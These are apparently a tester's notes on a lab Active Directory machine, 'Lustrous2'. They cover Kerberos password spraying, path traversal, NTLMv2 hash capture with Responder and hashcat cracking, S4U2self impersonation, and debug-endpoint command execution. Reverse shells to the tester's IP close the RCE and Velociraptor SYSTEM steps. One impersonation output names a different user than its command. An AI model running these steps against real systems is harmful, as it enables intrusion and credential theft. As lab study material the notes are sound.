Lustrous2

This is not a writeup, just my notes about the machine.

Operating System: Windows Server 2022 Standard

Chain: False

Credentials

Username	Password	Method	Scope
Emma.Bell	Summer2024!	Brute forcing	Domain User
Terence.Jordan	Lustrous2!	Brute forcing	Domain User
Thomas.Myers	Lustrous2024	Brute forcing	Domain User
SHARESVC	#1Service	LLMNR NTBNS poisoning	Domain Service Account

✅ Valid Usernames

Aaron.Norman
Adam.Barnes
Amber.Ward
Andrea.Smith
Ann.Lynch
Callum.Oliver
Carly.Walker
Chelsea.Smith
Chloe.Hammond
Christopher.Lawson
Claire.Parry
Darren.Lewis
Deborah.Jones
Dominic.West
Duncan.Smith
Elaine.Gallagher
Eleanor.Gregory
Emma.Bell
Francesca.Norman
Gary.Richards
Gerard.Ward
Glenn.Williams
Graeme.Pritchard
Harriet.Richardson
Henry.Connor
Howard.Robinson
Jacqueline.Phillips
Janice.Collier
Jasmine.Johnson
Joan.Wall
Judith.Francis
Justin.Williams
Kyle.Hussain
Kyle.Lloyd
Lawrence.Bryan
Leah.Elliott
Lewis.Khan
Liam.Wheeler
Lisa.Begum
Louis.Phillips
Lydia.Parker
Malcolm.Yates
Marie.Hill
Martin.Hamilton
Mathew.Roberts
Melissa.Thompson
Nathan.Carter
Nicola.Clarke
Nicola.Hall
Nigel.Lee
Pamela.Taylor
Robert.Russell
Ryan.Davies
Ryan.Moore
Ryan.Rowe
Samantha.Smith
Sara.Matthews
ShareSvc
Sharon.Birch
Sharon.Evans
Stacey.Barber
Stacey.Griffiths
Stephanie.Baxter
Stephanie.Davies
Steven.Sutton
Susan.Johnson
Terence.Jordan
Thomas.Myers
Tony.Davies
Victoria.Williams
Wayne.Taylor

🔑 Passwords list

Summer2024!
Lustrous2!
Lustrous2024
#1Service

Information Gathering

# Nmap 7.94SVN scan initiated Wed Apr 16 15:21:21 2025 as: nmap -p- --open -T5 -Pn -n -A -oN ext_tcp_lustrous2_allports -vvv 10.10.114.231
21/tcp    open  ftp           syn-ack ttl 127 Microsoft ftpd
53/tcp    open  domain        syn-ack ttl 127 Simple DNS Plus
80/tcp    open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
88/tcp    open  kerberos-sec  syn-ack ttl 127 Microsoft Windows Kerberos (server time: 2025-04-16 19:33:06Z)
135/tcp   open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
139/tcp   open  netbios-ssn   syn-ack ttl 127 Microsoft Windows netbios-ssn
389/tcp   open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
445/tcp   open  microsoft-ds? syn-ack ttl 127
464/tcp   open  kpasswd5?     syn-ack ttl 127
593/tcp   open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
636/tcp   open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3268/tcp  open  ldap          syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3269/tcp  open  ssl/ldap      syn-ack ttl 127 Microsoft Windows Active Directory LDAP (Domain: Lustrous2.vl0., Site: Default-First-Site-Name)
3389/tcp  open  ms-wbt-server syn-ack ttl 127 Microsoft Terminal Services
5985/tcp  open  http          syn-ack ttl 127 Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
9389/tcp  open  mc-nmf        syn-ack ttl 127 .NET Message Framing
49664/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49667/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49669/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49672/tcp open  ncacn_http    syn-ack ttl 127 Microsoft Windows RPC over HTTP 1.0
49677/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49695/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
49704/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55618/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC
55851/tcp open  msrpc         syn-ack ttl 127 Microsoft Windows RPC

Service Enumeration

FTP

FTP anonymous login enabled.

❯ wget -m --no-passive ftp://ftp:ftp@10.10.114.231

Valid usernames found inside the FTP service

• Look at the valid username section.

File leaked the audit findings

File: ITSEC/audit_draft.txt
----------------------------------
Audit Report Issue Tracking

[Fixed] NTLM Authentication Allowed
[Fixed] Signing & Channel Binding Not Enabled
[Fixed] Kerberoastable Accounts
[Fixed] SeImpersonate Enabled

[Open] Weak User Passwords

DNS

• Not vulnerable to DNS Zone Transfer

HTTP

The website use some type of authentication.

curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMT

Initial Foothold

Abusing Weak Credentials

File: possible-passwords.txt
---------------------------------
lustrous
development
homes
hr
it
itsec
production
sec
winter
spring
summer
fall

File: custom.rules
---------------------------------
:
c

$1
$2
$3
$4
$5
$6
$7
$8
$9

$1!
$2!
$3!
$4!
$5!
$6!
$7!
$8!
$9!

$2 $0 $2 $4
$2 $0 $2 $5

$2 $0 $2 $4 $!
$2 $0 $2 $5 $!

c $2 $0 $2 $4
c $2 $0 $2 $5

c $2 $0 $2 $4 $!
c $2 $0 $2 $5 $!

❯ hashcat --force possible-passwords.txt -r custom.rules --stdout | sort -u > mut_passwords.txt

Brute forcing Kerberos

NTLM authentication is disabled (STATUS_NOT_SUPPORTED )and Kerberos authentication was used.

❯ cat users.txt | while read line; do /opt/kerbrute/kerbrute bruteuser -d lustrous2.vl --dc 10.10.114.231 mut_passwords.txt $line -v -t 100 | grep --color=never "VALID LOGIN";done

2025/04/16 17:18:59 >  [+] VALID LOGIN:	Emma.Bell@lustrous2.vl:Summer2024!
2025/04/16 17:19:58 >  [+] VALID LOGIN:	Terence.Jordan@lustrous2.vl:Lustrous2!
2025/04/16 17:20:00 >  [+] VALID LOGIN:	Thomas.Myers@lustrous2.vl:Lustrous2024

Setting up Kerberos in my local computer

File: /etc/hosts
-----------------------
10.10.94.178 LUS2DC.Lustrous2.vl Lustrous2.vl LUS2DC

File: /etc/krb5.conf
--------------------------
[libdefaults]
	default_realm = LUSTROUS2.VL
[realms]
	LUSTROUS2.VL = {
		kdc = 10.10.94.178
		admin_server = 10.10.94.178
	}
[domain_realm]
	.lustrous2.vl = LUSTROUS2.VL

Requesting Ticket Granting Ticket to authenticate into Web application

The tester previously got 401 Unauthorized due was not authenticated with Kerberos.

curl http://lus2dc.lustrous2.vl -I
HTTP/1.1 401 Unauthorized
Transfer-Encoding: chunked
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate
X-Powered-By: ASP.NET
Date: Wed, 16 Apr 2025 21:28:37 GMT

Using valid credentials to request TGT.

❯ impacket-getTGT lustrous2.vl/Emma.Bell:Summer2024! -k
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Saving ticket in Emma.Bell.ccache

Attempting to request the website with curl using Kerberos authentication.

❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/' -I
HTTP/1.1 200 OK
Transfer-Encoding: chunked
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/10.0
WWW-Authenticate: Negotiate oYG3MIG0oAMKAQChCwYJKoZIhvcSAQICooGfBIGcYIGZBgkqhkiG9xIBAgICAG+BiTCBhqADAgEFoQMCAQ+iejB4oAMCARKicQRvRYGdwOopf3ALsYtJwX/1QAgdfZprXjjjIyInMZszgBJ7qgmvmkWukupJM3/vBWS8nLJ0NRhRiBwee8mrRojzvaLzAvXF6dTUw6bR+6C4/z+/SXd8QbHETNSq/YYLH/1Xb957F0SwbszCpjGJvEHv
Persistent-Auth: true
X-Powered-By: ASP.NET
Date: Thu, 17 Apr 2025 03:19:53 GMT

Setting up Firefox to use Kerberos authentication

Navigate to: about:config

Key	Value
network.negotiate-auth.trusted-uris	.lustrous2.vl
network.negotiate-auth.delegation-uris	.lustrous2.vl
network.negotiate-auth.using-native-gsslib	true

Discovering Path Traversal vulnerability

Vulnerable parameter: fileName

Abusing Path Traversal to download web.config file.

❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=../../web.config'
<?xml version="1.0" encoding="utf-8"?>
<configuration>
  <location path="." inheritInChildApplications="false">
    <system.webServer>
      <handlers>
        <add name="aspNetCore" path="*" verb="*" modules="AspNetCoreModuleV2" resourceType="Unspecified" />
      </handlers>
      <aspNetCore processPath="dotnet" arguments=".\LuShare.dll" stdoutLogEnabled="false" stdoutLogFile=".\logs\stdout" hostingModel="inprocess" />
    </system.webServer>
  </location>
</configuration>
<!--ProjectGuid: 4E46018E-B73C-4E7B-8DA2-87855F22435A-->%       

Capturing ShareSvc's NTLMv2 Hash

❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Download?fileName=\\10.8.5.48\Testing'


❯ sudo responder -I tun0
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.5.0

  To support this project:
  Github -> https://github.com/sponsors/lgandx
  Paypal  -> https://paypal.me/PythonResponder

<SNIF>

[SMB] NTLMv2-SSP Client   : 10.10.94.178
[SMB] NTLMv2-SSP Username : LUSTROUS2\ShareSvc
[SMB] NTLMv2-SSP Hash     : ShareSvc::LUSTROUS2:7690e22b2b8d57eb:8947641912174F1E60CDBC725C108B0E:0101000000000000004A7FAE00AFDB01CF12C9D34C36ADE900000000020008004E004C004B00380001001E00570049004E002D0037004500510045005400550052004C00490045004E0004003400570049004E002D0037004500510045005400550052004C00490045004E002E004E004C004B0038002E004C004F00430041004C00030014004E004C004B0038002E004C004F00430041004C00050014004E004C004B0038002E004C004F00430041004C0007000800004A7FAE00AFDB0106000400020000000800300030000000000000000000000000210000AF4DFB35102267BCA2807A12D0F747441622D31D20E985EDEC7ECFFC076110500A0010000000000000000000000000000000000009001C0063006900660073002F00310030002E0038002E0035002E00340038000000000000000000

Brute forcing NTLMv2 Hash and retrieving the plain text credential.

❯ hashcat -m 5600 ShareSVC.ntlmv2 /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

Dictionary cache hit:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344385
* Bytes.....: 139921507
* Keyspace..: 14344385

SHARESVC::LUSTROUS2:7690e22b<SNIF>0000000000:#1Service

Analyzing data with Bloodhound

Script: kozmer

The tester was not able to execute the BloodHound ingestor. Instead, they used ldapsearch together with ldapsearch_parser.py to collect and convert LDAP data into a format compatible with BloodHound.

❯ ldapsearch -LLL -H ldap://lus2dc.lustrous2.vl -Y GSSAPI -b "DC=LUSTROUS2,DC=VL" -N -o ldif-wrap=no -E '!1.2.840.113556.1.4.801=::MAMCAQc=' "(&(objectClass=*))" | tee output.txt
❯ python3 ldapsearch_parser.py output.txt ldapsearch_bofhound.txt
❯ pipx install bofhound
❯ bofhound --input ldapsearch_bofhound.txt --output /tmp/bh --zip

The group belongs to the Protected Users group, which enforces strict security restrictions. As a result, it is not possible to use techniques such as crafting Silver Tickets, NTLM authentication, or Kerberos delegation to impersonate the user. These protections are specifically designed to mitigate credential theft and abuse scenarios. However, in some specific cases, the S4U2Self Kerberos extension may allow a service account configured with appropriate delegation permissions to request a service ticket to itself on behalf of the protected user, potentially bypassing some of these restrictions under very controlled conditions.

Authenticating into the application as Share Admin user

❯ impacket-getTGT lustrous2.vl/SHARESVC:'#1Service' -dc-ip lustrous2.vl
❯ export KRB5CCNAME=SHARESVC.ccache

❯ impacket-getST -self -impersonate "Sharon.Birch" -k -no-pass lustrous2.vl/SHARESVC:'#1Service' -altservice HTTP/lus2dc.lustrous2.vl
Impacket v0.12.0 - Copyright Fortra, LLC and its affiliated companies 

[*] Impersonating Darren.Lewis
[*] Requesting S4U2self
[*] Changing service from SHARESVC@LUSTROUS2.VL to HTTP/lus2dc.lustrous2.vl@LUSTROUS2.VL
[*] Saving ticket in Darren.Lewis@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

❯ export KRB5CCNAME=Sharon.Birch@HTTP_lus2dc.lustrous2.vl@LUSTROUS2.VL.ccache

Analyzing LuShare.dll

Linux DLL decompiler: CodemerxDecompile

The application has a functionality in /file/debug that allows to execute commands if the right PIN is passed.

Executing curl command to confirm Remote Command Execution

Sending Reverse shell using rcat tool

Tool: rcat

❯ curl --negotiate -u : 'http://lus2dc.lustrous2.vl/File/Debug' -X POST --data-urlencode 'command=.\rcat.exe connect 10.8.5.48 1234' -d 'pin=ba45c518'

Privilege Escalation

Discovering Velociraptor software

PS C:\inetpub\lushare> get-itemproperty HKLM:\Software\Microsoft\Windows\CurrentVersion\Uninstall\* | select DisplayName,DisplayVersion,InstallLocation

DisplayName                                                    DisplayVersion  InstallLocation                      
-----------                                                    --------------  ---------------                      
<SNIF>
Velociraptor                                                   0.72.6                                                                                      

Creating an API client configuration as Administrator

PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --config server.config.yaml config api_client --name admin --role administrator c:\temp\api.config.yaml

Sending Reverse shell using rcat tool to gain access as NT Authority System

PS C:\Program Files\VelociraptorServer> .\velociraptor-v0.72.4-windows-amd64.exe --api_config c:\temp\api.config.yaml query "SELECT * FROM execve(argv=['cmd','/c','c:\\Temp\\rcat.exe','connect','10.8.5.48','4444'])"